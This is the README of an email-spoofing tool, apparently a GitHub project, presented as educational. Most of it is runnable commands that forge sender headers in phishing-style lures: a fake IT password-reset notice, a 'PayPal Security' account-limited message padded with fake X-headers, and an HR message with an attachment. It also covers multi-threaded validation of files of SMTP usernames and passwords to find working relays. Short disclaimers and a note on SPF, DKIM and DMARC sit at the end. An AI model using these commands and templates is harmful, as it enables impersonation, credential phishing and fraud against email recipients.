This repository contains Python scripts that demonstrate how email spoofing works for educational purposes only. Email spoofing is a technique used to forge email headers so that messages appear to originate from someone other than the actual sender.
This tool is meant for educational purposes only. Using this tool to send deceptive emails without consent is:
- Illegal in most jurisdictions
- Unethical
- May violate terms of service for email providers
- Could result in your IP/account being blacklisted
The author assumes no responsibility for any misuse of this information or script.
- Basic email spoofing with custom From header
- Advanced header manipulation
- Custom X-header generation
- Support for multiple recipients (To, CC, BCC)
- File attachments
- Reply-To address customization
- HTML email templates
- Debug mode for troubleshooting
- Bulk testing of SMTP servers from a file
- Multi-threaded SMTP server testing
- Colorized console output
- Python 3.6 or later
- Required Python packages:
- colorama
- Access to an SMTP server (most email providers will require authentication)
- SMTP server that allows header manipulation (many public email services now block this)
git clone https://github.com/Triotion/email-spoofing.git
cd email-spoofing
pip install coloramapython email_spoofer.py --server smtp.example.com --port 587 --user [email protected] --password your_password --from-name "Spoofed Name" --from-email [email protected] --to [email protected] --subject "Test Subject" --message "<h1>This is a test</h1><p>This email demonstrates spoofing.</p>"You can provide multiple SMTP servers in a file and the script will test them all to find working ones:
python advanced_email_spoofer.py --smtp-file smtp_servers.txt --from-name "Spoofed Name" --from-email [email protected] --to [email protected] --subject "Test Subject" --message "This is a test message"The SMTP server file format is simple:
host|port|username|password
For example:
smtp.example.com|587|[email protected]|password123
smtp.another.com|465|[email protected]|securepass
You can test which SMTP servers are working without sending emails:
python advanced_email_spoofer.py --smtp-file smtp_servers.txt --test-only --threads 10This will:
- Test all SMTP servers in the file
- Use 10 threads to speed up the testing process
- Show which servers are working
- Exit without sending any emails
--server: SMTP server address--port: SMTP server port (default: 587)--user: SMTP username (typically your real email)--password: SMTP password--smtp-file: File containing SMTP credentials in format "host|port|username|password"--test-only: Only test SMTP servers, don't send emails--threads: Number of threads for testing SMTP servers (default: 5)--debug: SMTP debug level (0-2)
--from-name: Display name you want to show as the sender--from-email: Email address you want to show as the sender--reply-to: Reply-to email address--to: Recipient email(s), comma separated--cc: CC recipient(s), comma separated--bcc: BCC recipient(s), comma separated--subject: Email subject--message: Email body content (HTML supported)--plain-text: Send as plain text instead of HTML--attach: File(s) to attach (can be used multiple times)--add-xheaders: Add fake X-headers to make email look more legitimate--custom-header: Add custom header in format "Header:Value" (can be used multiple times)
python email_spoofer.py \
--server smtp.example.com \
--port 587 \
--user [email protected] \
--password your_password \
--from-name "John Smith" \
--from-email [email protected] \
--to [email protected] \
--subject "Urgent: Action Required" \
--message "Please review the attached document and respond ASAP."python email_spoofer.py \
--server smtp.example.com \
--port 587 \
--user [email protected] \
--password your_password \
--from-name "IT Department" \
--from-email [email protected] \
--to [email protected] \
--subject "Password Reset Required" \
--message "<h2>Security Alert</h2><p>Your password needs to be reset. <a href='https://example.com'>Click here</a> to reset.</p>"# First, read the HTML template
TEMPLATE=$(cat email_template.html)
# Then use it in the command
python advanced_email_spoofer.py \
--server smtp.example.com \
--port 587 \
--user [email protected] \
--password your_password \
--from-name "Security Team" \
--from-email [email protected] \
--reply-to [email protected] \
--to [email protected] \
--subject "Security Alert: Verify Your Account" \
--message "$TEMPLATE"python advanced_email_spoofer.py \
--server smtp.example.com \
--port 587 \
--user [email protected] \
--password your_password \
--from-name "PayPal Security" \
--from-email [email protected] \
--to [email protected] \
--subject "Your account has been limited" \
--message "<p>Dear customer,</p><p>Your PayPal account has been temporarily limited. Please <a href='https://example.com'>verify your information</a> to restore access.</p>" \
--add-xheaders \
--custom-header "List-Unsubscribe: <mailto:[email protected]>" \
--custom-header "Precedence: bulk"python advanced_email_spoofer.py \
--smtp-file smtp_servers.txt \
--from-name "HR Department" \
--from-email [email protected] \
--to "[email protected],[email protected]" \
--cc "[email protected]" \
--subject "Updated Company Policy" \
--message "<p>Please find attached the updated company policy document.</p><p>All employees must read and acknowledge by Friday.</p>" \
--attach policy_document.pdfpython advanced_email_spoofer.py \
--smtp-file smtp_servers.txt \
--test-only \
--threads 10Modern email systems have multiple protections against spoofing:
- SPF (Sender Policy Framework): Validates if the sending server is authorized to send emails for the domain
- DKIM (DomainKeys Identified Mail): Cryptographically verifies email authenticity
- DMARC (Domain-based Message Authentication, Reporting & Conformance): Policy framework that uses SPF and DKIM results
These protections mean that while you can change the "From" header, receiving mail servers can detect that the email wasn't actually sent from the claimed domain, often marking such emails as spam or rejecting them entirely.
To protect yourself from email spoofing:
- Check email headers for discrepancies
- Be suspicious of unexpected emails, especially those requesting sensitive information
- Enable SPF, DKIM, and DMARC for your own domains
- Use email providers that implement strong anti-spoofing measures
Legitimate reasons to understand email spoofing include:
- Security research and education
- Penetration testing (with proper authorization)
- Testing your own email security systems
-
Most modern email services will detect spoofed emails and mark them as spam or reject them entirely.
-
To see the email headers that were actually received, ask the recipient to view the full headers of the email.
-
For testing, it's recommended to send to email accounts you control.
-
Some email providers (like Gmail) may rewrite your From header to include your actual authenticated email, such as:
From: "John Smith via [email protected]" <[email protected]>
If you find this tool valuable, consider donating to support ongoing development:
- BTC: bc1qtkm7dzjp76gx8t9c02pshfd8rzarj6gj9yzglu
- ETH: 0x88Aa0E09a5A62919321f38Fb4782A17f4dc91A9B
- XMR: 0x6730c52B3369fD22E3ACc6090a3Ee7d5C617aBE0
Created by @Triotion - Telegram
This project is licensed under the MIT License - see the LICENSE file for details.